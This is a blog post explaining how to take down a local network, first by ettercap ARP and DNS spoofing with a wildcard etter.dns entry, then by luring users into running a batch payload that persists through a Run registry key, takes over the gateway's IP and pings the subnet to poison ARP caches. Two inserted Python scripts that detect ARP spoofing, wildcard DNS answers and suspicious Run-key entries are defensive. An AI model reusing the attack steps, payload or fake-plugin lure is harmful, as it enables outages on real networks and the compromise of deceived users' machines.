Thursday 9 May 2013

Bring Down A Network....


This time I am going to share some of my experience of bringing down networks, which I have done many times. There are a couple of processes I have used to bring down a network. These are general techniques we use in hacking, but with them you can bring down a network as well.

Bringing down a network requires knowledge of networking concepts, e.g. ARP, default gateway, MAC address, DNS and a few more. In both processes we will be using Backtrack. The first process brings the network down temporarily without using any type of virus or worm: it stops Internet access, but all local network access keeps running. In the second process we use our own payload to bring down both Internet and LAN connectivity in the network. Whenever a user tries to access any website, the browser downloads the payload and asks the user to run it. If the user runs it as administrator, that PC will no longer be able to connect to the Internet or the LAN.

First Process 

Well, this process is nothing but DNS poisoning using ettercap. We normally use this attack for MITM, but in this case we will use it to block a website or to bring down a network. I think you all know what ettercap is and how to do DNS poisoning with it; I have already explained how to do it with tab-nabbing in my previous post, but I will explain it here as well. If you use this process, the network stays down only as long as your PC is powered on; once you shut down your PC the attack stops and the network starts running again within a few minutes.
First of all you must be connected to the network with your Backtrack machine, or you can connect using your Windows machine and run Backtrack in VirtualBox. If you are running Backtrack in VirtualBox, make sure to put your interface in bridged mode so that the virtual machine is connected to the network directly (I am not going to explain how to do that; just google it).
OK, now let's start DNS poisoning on the network.

Step 1:) Install ettercap (as root )
# apt-get -y install ettercap

Step 2:) Then enable IP forwarding
# echo 1 > /proc/sys/net/ipv4/ip_forward

Step 3:) Then locate the etter.dns file
You may find more than one etter.dns; select the one shown in the picture, which is the path used in Step 4.
# locate etter.dns

Step 4:) Open the file and add an entry at the end of the file
# nano /usr/local/share/ettercap/etter.dns

Now add the entry at the end of the file 

www.url-of-website-to-block.com            A   your_ip_address

Generally we add the name of the website we want to block. But in this case we want to bring down the network so that the Internet won't work, so we add all websites using the asterisk (*). To do that add
*.*.*           A     ip_address

You can add your own IP address or any other IP address; make sure the IP address you add either does not exist or does not have a web server running on it.

Step 5:) Now start the spoofing
# ettercap -T -q -M arp:remote -P dns_spoof //

After this the network will be down, because all the PCs connected to the LAN think you are the DNS server of the network and send all their DNS queries to you, and we have already defined the IP address of every website as your IP address, so whenever a user tries to open any website the traffic is redirected to your PC.
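From the defender's side, the first process leaves two measurable symptoms on the LAN: the gateway's IP address is suddenly answered for by more than one MAC (the arp:remote poisoning), and the resolver starts handing out one IP for every name asked (the wildcard etter.dns entry). The following Python script is an added example, not part of the original post or of ettercap; it runs both checks over constructed ARP-monitor and DNS-resolver log lines, and the gateway address, MAC addresses and hostnames in it are assumed values chosen for the illustration.

```python
"""Added example: spot ARP spoofing of the gateway and wildcard DNS answers
from constructed log lines. Nothing here is taken from the original post."""
from collections import defaultdict

# Constructed sample: "timestamp sender_ip sender_mac" as a passive ARP monitor
# might log it. 192.168.0.1 is the assumed gateway, aa:bb:cc:dd:ee:ff its real
# MAC, and 11:22:33:44:55:66 a second host that starts answering for it.
ARP_LOG = """\
10:00:01 192.168.0.1 aa:bb:cc:dd:ee:ff
10:00:05 192.168.0.23 de:ad:be:ef:00:23
10:00:09 192.168.0.1 11:22:33:44:55:66
10:00:12 192.168.0.1 aa:bb:cc:dd:ee:ff
10:00:15 192.168.0.1 11:22:33:44:55:66
"""

# Constructed sample: "timestamp client qname answer_ip" from a resolver log.
# Five unrelated names all resolve to 192.168.0.50, one internal name does not.
DNS_LOG = """\
10:01:00 192.168.0.23 www.example.com 192.168.0.50
10:01:02 192.168.0.23 mail.example.org 192.168.0.50
10:01:03 192.168.0.24 cdn.example.net 192.168.0.50
10:01:04 192.168.0.24 www.example.edu 192.168.0.50
10:01:05 192.168.0.25 update.example.com 192.168.0.50
10:01:06 192.168.0.25 intranet.corp.example 192.168.0.10
"""


def gateway_claimants(arp_log, gateway_ip):
    """Return the set of MACs seen claiming gateway_ip.

    A healthy LAN yields exactly one. Two or more means the IP-to-MAC binding
    of the gateway is unstable, which is what ARP poisoning looks like from
    the outside. Malformed lines are skipped rather than raising."""
    macs = set()
    for line in arp_log.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue
        _, ip, mac = parts
        if ip == gateway_ip:
            macs.add(mac.lower())
    return macs


def wildcard_answers(dns_log, min_names=4):
    """Group answers by IP and return {ip: sorted names} for every IP that is
    the answer for at least min_names distinct names.

    Shared hosting and CDNs also produce many-names-to-one-IP, so treat this
    as a triage signal to be checked against the gateway finding, not proof."""
    names_by_ip = defaultdict(set)
    for line in dns_log.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        _, _, qname, answer = parts
        names_by_ip[answer].add(qname.lower())
    return {ip: sorted(names) for ip, names in names_by_ip.items()
            if len(names) >= min_names}


def assess(arp_log, dns_log, gateway_ip):
    """Combine both checks into a list of human-readable findings
    (empty when the logs look clean)."""
    findings = []
    macs = gateway_claimants(arp_log, gateway_ip)
    if len(macs) > 1:
        findings.append(
            f"gateway {gateway_ip} claimed by {len(macs)} MACs: {sorted(macs)}")
    for ip, names in wildcard_answers(dns_log).items():
        findings.append(
            f"{ip} is the answer for {len(names)} distinct names, e.g. {names[:3]}")
    return findings


if __name__ == "__main__":
    for finding in assess(ARP_LOG, DNS_LOG, "192.168.0.1"):
        print("ALERT:", finding)
```

The two checks are deliberately kept separate: a flapping gateway MAC alone can be a misconfigured HSRP pair or a replaced router, and a many-names-to-one-IP answer alone can be a CDN, but the two together, from the same time window, match the attack described above closely enough to act on (pin the gateway's MAC with a static ARP entry and restart the affected resolver clients).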




Second Process


The second process is based on the first. In this attack we create a payload and upload it to our web server (it can be localhost). We also do DNS spoofing on the network, which is the first process discussed above. After DNS spoofing, all the traffic is redirected to your PC and opens the website hosted on your PC. We host a website that has an auto-download feature, or by any other means make the victim download the payload and run it (you can show messages like "your browser doesn't have the supported plugin, click here to download, run it as Administrator", etc.). Once the user runs that payload, the network will be down as long as that victim is connected to the network. If all the PCs in the network are running the payload, the network will be down for good.

We will create the payload in batch programming. If you don't know how to create a batch file, click here. You need to convert it from .bat to .exe (use QBFC) and turn it into a ghost application. A ghost application runs in the background, so the victim will not get any idea of it.
Batch Code for Payload:-

Copy the following lines into a batch file.
@echo off

We copy this file to some safe location.
copy <name of your File> <New Location of your file>

We add it to the startup programs.
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run /v Payload /t reg_sz /d <New Location of your Batch File>

Once the file has been added to the startup, it will start by default.
Now that the file is in the startup we can launch the attack on the network!!!
Change the IP address of the victim PC to the default gateway of the network.
netsh int ip set address "local area connection" static 192.168.0.1 255.255.255.0

Give the name of the interface as "Local Area Connection", or if you are using Wi-Fi give "Wireless Network Connection"; the victim will be using either wireless or wired.
Now a few of the victims are using the IP address of the default gateway (only a few of the PCs in the network will be running the payload, not all, because some may be shut down, some may not have run the payload, or for any other reason). We ping the entire network from that victim so that the ARP cache of every PC in the network is poisoned every time the victim starts the PC. As multiple PCs are running the payload, your attack is launched by multiple PCs, and your own PC can be removed from the network once a few of the PCs are running the payload. OK, now let's ping the entire network.

:: network part of your network
set a=192.168.0
:: starting host part of the network
set b=1
:: loop start
:start
:: ping one host; -n specifies the count of ping requests
ping %a%.%b% -n 1
:: increase the value of b so that we ping the next PC
set /a b=%b%+1
:: reset b if it exceeds the max host address; give the limit as per your requirement
if %b%==255 set b=1
:: restart the loop
goto start
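What the payload leaves on a compromised Windows host is a Run-key value that launches a batch file from a user-writable path. That is the kind of entry an incident responder looks for when triaging startup persistence, and it is easy to check from the output of reg query. The Python script below is an added example, not part of the original post: it parses constructed reg query output for the Run key, extracts the launched path from each value (handling quoted paths with arguments), and flags entries that run a script or live in a user-writable directory. The value names, paths and the list of "user-writable" prefixes are assumptions for the illustration.

```python
"""Added example: triage Run-key persistence entries from constructed
`reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run` output.
Entry names and paths are constructed; nothing is taken from a real host."""
import re

# Constructed sample in the layout reg query prints (four spaces between
# fields). REG_EXPAND_SZ data is shown unexpanded, exactly as reg query does.
RUN_KEY_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    Payload    REG_SZ    C:\Users\Public\netfix.bat
    Updater    REG_SZ    C:\ProgramData\upd\svc.exe
"""

# Extensions that mean "a script is being started at boot", not a signed binary.
SCRIPT_EXTENSIONS = (".bat", ".cmd", ".vbs", ".js", ".ps1")
# Assumed list of directories any local user can write to; an administrator-
# installed autostart program has no business being launched from these.
USER_WRITABLE_PREFIXES = (
    "c:\\users\\", "c:\\programdata\\", "c:\\temp\\", "c:\\windows\\temp\\",
)

# name, type, data separated by runs of four spaces; value names may contain
# single spaces, so the name group is non-greedy.
LINE_RE = re.compile(
    r"^\s+(?P<name>.+?)\s{4}(?P<type>REG_[A-Z_]+)\s{4}(?P<data>.*)$")


def parse_run_key(text):
    """Return a list of (name, type, data) tuples, skipping the key header
    and blank lines."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            entries.append((m["name"], m["type"], m["data"].strip()))
    return entries


def launched_path(data):
    """Extract the program path from a Run value: the quoted path when the
    value starts with a quote, otherwise the first whitespace-separated token.
    Arguments after the path are dropped."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    return data.split()[0] if data else ""


def triage(entry):
    """Return the list of reasons an entry deserves a closer look
    (empty means nothing stood out)."""
    _, _, data = entry
    path = launched_path(data).lower()
    reasons = []
    if path.endswith(SCRIPT_EXTENSIONS):
        reasons.append("launches a script rather than an executable")
    if path.startswith(USER_WRITABLE_PREFIXES):
        reasons.append("lives in a user-writable directory")
    return reasons


def suspicious_entries(text):
    """Map each flagged value name to its reasons."""
    result = {}
    for entry in parse_run_key(text):
        reasons = triage(entry)
        if reasons:
            result[entry[0]] = reasons
    return result


if __name__ == "__main__":
    for name, reasons in suspicious_entries(RUN_KEY_OUTPUT).items():
        print(f"{name}: {'; '.join(reasons)}")
```

The same parser works on the HKCU Run key and the RunOnce keys, which hold the user-level equivalents of this persistence; on a live host the text would come from running reg query with the key path, and the flagged entries should be cross-checked against the interface configuration, since a machine that has had its address statically set to the gateway IP (as the payload does with netsh) is the other half of this picture.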



Run it at your own risk.
These are just the processes I have used to bring down a few networks.


If you have any doubts, please comment.
